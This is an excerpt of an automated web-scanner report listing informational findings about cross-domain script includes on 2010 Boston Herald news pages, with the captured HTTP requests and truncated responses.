<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.129. http://bostonherald.com/news/politics/view/20101107mass_voters_back_loosening_of_marijuana_laws/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101107mass_voters_back_loosening_of_marijuana_laws/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/politics/view/20101107mass_voters_back_loosening_of_marijuana_laws/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:21:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.130. http://bostonherald.com/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:21:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 83414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.131. http://bostonherald.com/news/politics/view/20101107moneybags_menino/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101107moneybags_menino/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/politics/view/20101107moneybags_menino/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:21:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.132. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:11:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.133. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/srvc=home&position=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/srvc=home&position=1

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/srvc=home&position=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.134. http://bostonherald.com/news/regional/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/regional/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:10:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 59753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.135. http://bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

9.136. http://bostonherald.com/news/regional/view/20101107big_homecoming_planned_for_nh_girl_who_lost_limbs/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107big_homecoming_planned_for_nh_girl_who_lost_limbs/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20101107big_homecoming_planned_for_nh_girl_who_lost_limbs/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:18:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.137. http://bostonherald.com/news/regional/view/20101107bridge_work_hits_ducks_dinosaurs/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107bridge_work_hits_ducks_dinosaurs/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20101107bridge_work_hits_ducks_dinosaurs/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:17:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



